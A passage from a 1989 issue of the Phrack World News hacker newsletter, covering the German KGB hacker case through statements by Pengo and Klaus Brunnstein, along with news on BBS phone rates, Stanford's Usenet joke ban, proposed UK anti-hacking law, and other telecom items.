     article).  Apart from Hagbard, those guys never were hackers, and it seems
     to turn out that they have really been mere spies.

KL:  Were there any other repercussions to this case besides bad publicity?

P:   Currently, I'm puzzling out a new way of earning money, since my company
     decided to fire me.  That's what you get if you play with fire :-)

     Luckily, I'm optimist!

-Pengo
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Pengo Speaks In RISKS Digest                                     March 10, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In RISKS Digest, Klaus Brunnstein mentioned my name in the context of the
hacker/espionage case recently discovered by the German authorities.  Since Mr.
Brunnstein is not competent to speak about the background of the case, I'd like
to add some clarification to prevent misunderstandings, especially concerning
my role.  I think it is a very bad practice to just publish names of people
without giving background information.

I have been an active member of the net community for about two years now, and
I want to explicitly express that my network activities have in no way been
connected to any contacts to secret services, be it Western or Eastern ones.

On the other hand, it is a fact that when I was younger (I'm 20 years old now),
there had been a circle of people which tried to make deals with an eastern
secret service.  I have been involved in this, but I hope that I did the right
thing by giving the German authorities detailed information about my
involvement in the case in the summer of 1988.

As long as the lawsuit on this case is still in progress, I am not allowed to
give out any details about it to the public.  As soon as I have the freedom to
speak freely about all of this, I'll be trying to give a detailed picture about
the happenings to anyone who's interested.

I define myself as a hacker.  I acquired most of my knowledge by playing around
with computers and operating systems, and yes, many of these systems were
private property of organizations that did not even have the slightest idea
that I was using their machines.  I think that hackers (people who creatively
handle technology and not just see computing as their job) do a service for the
computing community in general.  It has been pointed out by other people that
most of the "interesting" modern computer concepts have been developed or
outlined by people who define themselves as "hackers."

When I started hacking foreign systems, I was 16 years old.  I was just
interested in computers, not in the data which has been kept on their disks.
As I was going to school at that time, I didn't even have the money to buy my
own computer.  Since CP/M (which was the most sophisticated OS I could use on
machines which I had legal access to) didn't turn me on anymore, I enjoyed the
lax security of the systems I had access to by using X.25 networks.

You might point out that I should have been patient and wait until I could go
to the university and use their machines.  Some of you might understand that
waiting was just not the thing I was keen on in those days.  Computing had
become an addiction for me, and thus I kept hacking.  I hope this clears the
question "why."

It was definitely NOT to give the Russians any advantage over the USA, nor to
become rich and get a flight to the Bahamas as soon as possible.  The results
of the court trial will reveal this again, but until then I want to keep rumors
out that the German hackers were just the long (?) arm of the KGB to harm
Western computer security or defense power.

It should also be pointed out that the Chaos Computer Club has in no way been
connected to this recent case, and again, that the CCC as an organization has
never been a "hacker group."  The CCC merely handles the press for hackers, and
tries to point out implications of computers and communications for society in
general.

I have already lost my current job, because of my name being published in DER
SPIEGEL and in RISKS.  My business partners became anxious about my involvement
in the case.  Several projects I was about to complete in the near future have
been cancelled, which forces me to start again at the beginning in some way.

                                                    -Hans Huebner
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Klaus Brunnstein Reacts To Pengo In RISKS Digest                 March 14, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Pengo" Hans Huebner stated that he had no share in the KBG case as I mentioned
in my report.  Since I myself had no share in the KGB case (and in this sense,
I am not as good a source as Pengo!), I tried to transmit only information
where I had at least *two independent sources* of *some credibility*.  In
Pengo's case (where I was rather careful because I could not believe what I
read), my two sources were:

    - The SPIEGEL report (I personally agree that names should be avoided as
      long as current investigations are underway; yet in this cases, the names
      have been widely published in FRG and abroad);

    - A telephone conversation with a leading Chaos Computer Club person after
      he had informed me about a public debate at Hannover fair (where the
      German daily business newspaper, Wirtschafts, which had organized a
      discussion with data protection people and CCC).

      I asked him whether he knew of Pengo's contribution; he told me that
      he directly asked Pengo, "Did you, without pressure and at your own
      will, work for the Russians?"  Pengo answered, "Yes."  He told me that
      he immediately cut-off any contact to Pengo.  Evidently, there was a
      controversial discussion in Chaos Computer Club whether on should react
      in such a strict manner.  I understand the strong reaction because the
      KGB hackers severely damaged the CCC's attempt to seriously contribute to
      the public discussion of some of the social consequences of computers.
      They now face, more seriously than before, the problem of being regarded
      as members of a criminal gang.

-Klaus Brunnstein
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                    Volume Three, Issue 25, File 11 of 11

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN                Issue XXV/Part 3                 PWN
            PWN                                                 PWN
            PWN                 March 29, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


Southwestern Bell Vs. Bulletin Board Operators                February 27, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For those of you unfamiliar with the situation, there is a major battle between
Southwestern Bell Telephone company and bulletin board operators in Oklahoma
City, Oklahoma.  Southwestern Bell demands the right to charge more for phone
lines being used for the operation of bulletin boards.  They claim that data
communications should be charged more to begin with and that running a bulletin
board is like a business and business lines should cost more than residential
lines.

Currently the conflict is being described as a stalemate.  Southwestern Bell is
using a war-dialer in an attempt to find out what numbers are actually bulletin
board numbers.  Several bulletin boards have already gone down because of this.
However, in support of the BBS community is a major television news station (a
CBS affiliate I believe) and several corporate lawyers have also taken an
interest in he BBS side.  The lawyers say that a court case had come up several
years ago concerning bulletin boards and Southwestern Bell.  In that case SWB
lost which meant that it is illegal for SWB to raise the rates in Oklahoma City
for bulletin board phone lines.

Southwestern Bell has been deceitfully trying to trick system operators
(sysops) into saying that they make money off of their systems.  They get the
sysops to say that they run "non-profit" bulletin boards.  Non-profit implies
that you are taking in income to offset your expenses, but do not make a
profit.  This is simply not true for most bulletin boars; they do not take in
anything.  In the meantime, these poor victims are getting their rates
increased.  It has spread through the bulletin board community in Oklahoma City
like wildfire and they are just now getting wise to Southwestern Bell's fraud.

Fortunately, the bulletin board users of Oklahoma City are a very vocal bunch
of people and many of them are calling Southwestern Bell by the hundreds and
telling them that if they raise the rates of the bulletin boards, they will
have their secondary lines taken out.  Many sysops have said the same.  This is
the stalemate right now.  Apparently, the Southwestern Bell executives are
realizing that if they do this they will actually make less money than if they
leave the bulletin boards alone.  After all, their whole purpose is to make
more money.  A user organization is being put together in Oklahoma City in an
attempt to stir up enough opposition to this move by Southwestern Bell for them
to reconsider.  So far it is working, though they are far from a settlement.

The latest news heard from one of the leaders of this new user group was that
some major big-wig of Southwestern Bell and AT&T had flown into Oklahoma City
in an uproar about the actions taken by Southwestern Bell so far.  Apparently,
they do not like what the local executives are doing.  In addition, the lawyers
who have agreed to help are investigating a similar incident out in California.

This is the general manager's office.  It might be useful to call this number
and indicate that the bad publicity is spreading outside of Oklahoma City;
maybe Southwestern Bell will rethink their position.

                            Information Provided By
                                Various Sources
_______________________________________________________________________________

Attention Telecommunication Fanatics                              March 7, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following was taken from TELECOM Digest, an Internet newsletter...


From: Red Knight
Subject: Review of Bulletin Board System

Please accept my invitation to the a Telecommunication Oriented Bulletin Board
System, located in Flushing New York.

Our main objective is to discuss about the various telephony related concepts,
for example, ESS, DMS, COSMOS, Cellular, Mobile, Satellite Communications,
Fiber Optic, PBX, Centrex, Phone Rates, Signalling Systems, World Wide
Telephone, Switching Systems, ISDN.

We are trying to get as many knowledgeable users as we possibly can.

Not only does our Bulletin Board Specialize in Telecommunication, but also has
a few conferences for Computer Security.  We certainly have many experts on
board who would be willing to discuss security related material.

We have a UNIX conference were all the UNIX wizards get together.  We have a
special DEC User group.  We also a conference for discussions on Viruses and
how it can be written and prevented.

Other conferences are as follows: Radio Hobbies>Hacking News>LockSmithing,
                                  Pyrotechnics>Telco Numbers>TAP>Books>
                                  Surveillance Systems>Pascal>Generic C>
                                  Suggestions>Mac>BBS Numbers>Phrack>Cable>
                                  .....and many other miscellaneous

Requirements:  We don't have any requirements.  Anyone is welcome.  Access is
               given immediately.  We also allow alias names if desired.  We
               hope you will enjoy your stay.

The Telecommunication [H.D.BBS] <-- Hackers Den

[A 2600 Magazine Bulletin Board System]

Data: (718)358/9209

300/1200
_______________________________________________________________________________

Computer Users Worry That Stanford Set Precedent              February 20, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Tom Philp (San Jose Mercury News)

 "Decision to block bulletin board impedes free access to public information."

Computer scientists at Stanford fear the university has entered a never-ending
role as a moral regulator of computer bulletin boards by recently blocking
access to a list of jokes deemed to serve no "university educational purpose."

Many computer users on campus consider bulletin boards to be the libraries of
the future - and thus subject to the same free access as Stanford's library
system.  Instead, Stanford apparently has become the nation's first university
to block access to part of the international bulletin network called Usenet,
which reaches 250,000 users of computers running the Unix operating system,
according to a computer scientist who helped create the network.

To some computer users, Stanford's precedent is troubling.  "We get into some
very, very touchy issues when system administrators are given the authority to
simply get rid of files that they deem inappropriate on publicly available
systems," said Gary Chapman, executive director of Computer Professionals for
Social Responsibility, a Palo Alto-based organization with 2,500 members.  "My
personal view is that freedom of speech should apply to computer information."

Ralph Gorin, director of Academic Information Resources at Stanford, disagrees.
"I think that it's very clear that one should be either in favor of free speech
and all of the ramifications of that or be willing to take the consequences of
saying free speech sometimes, and then having to decide when," Gorin said.

Since the jokes ban, more than 100 Stanford computer users, including a leading
researcher in artificial intelligence, have signed a protest petition.  And
there is some evidence to indicate Stanford officials are looking for a way out
of the dilemma they have created.

The joke bulletin board, called "rec.humor.funny," is one of several bulletin
boards that discuss controversial topics.  Stanford, for example, continues to
permit access to bulletin boards that allow students to discuss their use of
illegal drugs, sexual techniques, and tips on nude beaches.  Gorin said he is
unaware of those bulletin boards.

The jokes bulletin board came to Stanford officials' attention in December,
after a report about it in a Canadian newspaper.  The jokes hit a raw nerve
with campus officials, who have been plagued by a variety of racist incidents
on campus.  And so they decided on January 25, 1989 to block the jokes from
passing through the university's main computer.  "At a time when the university
is devoting considerable energy to suppress racism, bigotry and other forms of
prejudice, why devote computer resources to let some outside person exploit
these?"  Gorin explained.

Stanford officials were troubled because the jokes bulletin board is
"moderated," meaning that one person controls everything that it publishes.
The jokes bulletin board "does not in itself provide for discussion of the
issues that it raises," Gorin said.  The moderator, Brad Templeton of Waterloo,
in the Canadian province of Ontario, publishes only jokes.  Comments he
receives go on a separate bulletin board, called "rec.humor.d."  For Stanford,
the existence of a comment bulletin board is not enough because people who call
up the jokes will not necessarily see the comments.

The problem with "unmoderated" bulletin boards is clutter, according to Eugene
Spafford, a computer scientist at Purdue University who is one of the pioneers
of Usenet.  The network accumulates the equivalent of 4,000 double-spaced,
typewritten pages every day, far too many comments for any person to read.
"People who use a network as an information resource like a more focused
approach," Spafford said.  They is why another, unmoderated, bulletin board
that has many comments and fewer - but equally offensive - jokes, is far less
popular.  Stanford does not block transmission of that bulletin board.
Templeton's bulletin board is the most popular of the 500 on Usenet.  An
estimated 20,000 computer users pull up the jokes on their screens every day,
Spafford said.

Usenet has its own form of democracy, calling elections to determine whether a
new bulletin board should be created, and who - if anyone - should moderate it.
Templeton's jokes bulletin board was created by such a vote.  Stanford's
decision to block access to it "strikes me as hypocritical," Spafford said.
"At best, it's someone who doesn't understand the situation who is trying to do
something politically correct."

John McCarthy, a Stanford computer science professor and one of the founders of
the field of artificial intelligence, has met with university President Donald
Kennedy to discuss his opposition to blocking the jokes.  "No one of these
(bulletin boards) is especially important," McCarthy said.  The point is that
regulating access to them "is not a business that a university should go into."

Since deciding to block access to the bulletin board, the administration has
referred the issue to the steering committee of Stanford's Faculty Senate.  The
future of the bulletin board may end up in the hands of the professors.  "I
think that is an entirely appropriate internal process for reaching that
decision," Gorin said.

Added McCarthy:  "I should say that I am optimistic now that this ban will be
corrected.  There are some people who think they made a mistake."
_______________________________________________________________________________

Outlaw Computer Hacking -- CBI                                    March 1, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Peter Large (Guardian Newspaper)

 "Computer hacking should be made a criminal offense, the CBI said yesterday."

The employer's organization said it was vital to secure a stable base for
computer development, since computers played a major part in the nation's
economic competitiveness and "social well-being."  Computer buffs were
increasingly gaining unauthorized access to confidential information held by
banks and other companies in computer databanks, it said.

Much computer fraud is hidden by firms, but the conservative consensus estimate
is that the cost to British business is at least 30 million a year.

But computer disasters, caused by software failures, fire and power failures,
are reckoned to be cost about ten times that.

The CBI, in its response to the Law Commission's paper on computer misuse, made
six proposals:

     *  Hacking cases should be tried by jury;

     *  The concept of "criminal damage" should cover computer programs and
        data and attacks by computer viruses (rogue programs that can disrupt
        or destroy data);

     *  Laws should be harmonized internationally so that hackers cannot
        operate across country boundaries;

     *  The offense of obtaining unauthorized access should include
        non-physical access, such as computer eavesdropping;

     *  Even unsuccessful attempts to hack should be subject to criminal
        sanctions;

     *  The value of confidential commercial information should be protected by
        civil remedies for loss or damage caused by hackers.

The United States, Canada, Sweden, and France have outlawed hacking, but it is
not an offense in Great Britain unless damage is done, such as fraud or theft.
In February, the Jack Report on banking law proposed outlawing the hacker.  The
Law Commission has produced a discussion document and is to make firm proposals
later this year.
_______________________________________________________________________________

Highest German Court Strikes Down A Telecommunications Law       March 23, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The law in question reads:

Paragraph 15, Section II of the law regulating telecommunication equipment:

     "Any person who installs, changes, or uses modifiable
     telecommunications equipment in violation of the lending conditions
     will be punished with two years imprisonment or fines."

The German Supreme Court has declared this law unconstitutional and
null-and-void in a decision of June 22, 1988.  The consequence to this is that
imported modems can no longer be confiscated (according to the guidelines of
the Code of Criminal Procedures).

The German legislature has been called upon to pass a new law.  However,
because there exists such strong interest and influence of industry, users, and
the European market-community against such a new prohibitive law, it is
believed that there is reason for optimism and no such prohibitive law will be
passed.
_______________________________________________________________________________

California PUC Pulls Plug On AOS                                 March 24, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
According to a story in the San Francisco Examiner, Business Section, the
Public Utilities Commission directed TPC (Pacific Bell) to disconnect 54
privately owned pay phones in its first enforcement action against "price
gouging by some operator services".

"Privately owned pay phones can charge no more than 10 cents above Pacific Bell
and AT&T rates for local calls or calls in California".

The 54 privately owned pay phones belonged to 12 owners, and their charges were
found to be at least 90% higher than the authorized rates, and sometimes were
up to three times as high.  All owners had been warned of the overcharging in
November.  Under the PUC orders, Pacific Bell has sent letters to the owners
notifying them that their plug will be pulled in seven days.

The article also mentioned the FCC last month imposed some restrictions on five
AOS firms accused of egregious gouging that require the companies "to identify
themselves to each caller and disclose rates if computers asked."
_______________________________________________________________________________

PWN Quicknotes
~~~~~~~~~~~~~~
1.  The University of Delaware Library System electronic card catalog (DELCAT)
    is now available for access to residents throughout Delaware.  In each
    county within Delaware, there is now a local number which you can call to
    link up.  Service is provided by the Bell Atlantic Public Data Network.

    The numbers are:

                       New Castle County (302) 366-0800
                       Sussex County     (302) 856-7055
                       Kent County       (302) 734-9465

    Users wishing to call from out of state should call (302) 366-0800.  Normal
    long distance charges apply for out of state callers.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2.  Strange as it may sound, several bulletin board system operators
    in the northeastern part of the country have received letters from the
    Federal Bureau of Investigation (FBI) telling them to shut down their
    systems or face unpleasant consequences.  Two of the bulletin board systems
    in question are The Edge and Ridgewood.  Confirmation that these letters
    were actually from the FBI has still not been achieved.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
3.  Mark Tabas is currently supposed to be working on a book.  He has requested
    that anyone that has copies of any of his text files or news reports about
    him should contact him.

    Unfortunately, we are not at liberty to give out his mailing address in a
    forum as public as Phrack World News.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
4.  CompuServe (CIS) just announced that they will begin charging a $1.50 per
    month user fee over and above whatever usage is charged.  The fee will be
    waived during the first three months of a new account.  They will, however,
    make some services free -- like looking up your charges.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
5.  Unconfirmed rumors from the security side of the hacking community state
    that GTE Telenet has acquired new assistance in the fight against Telenet
    abusers and new security measures are already in the process of
    implementation.

    The alledged new assistance was in the form of personnel:  People who are
    regarded as "experts" not only on Telenet, but the hacking community as
    well.
______________________________________________________________________________



--------------------------------------------------------------------------------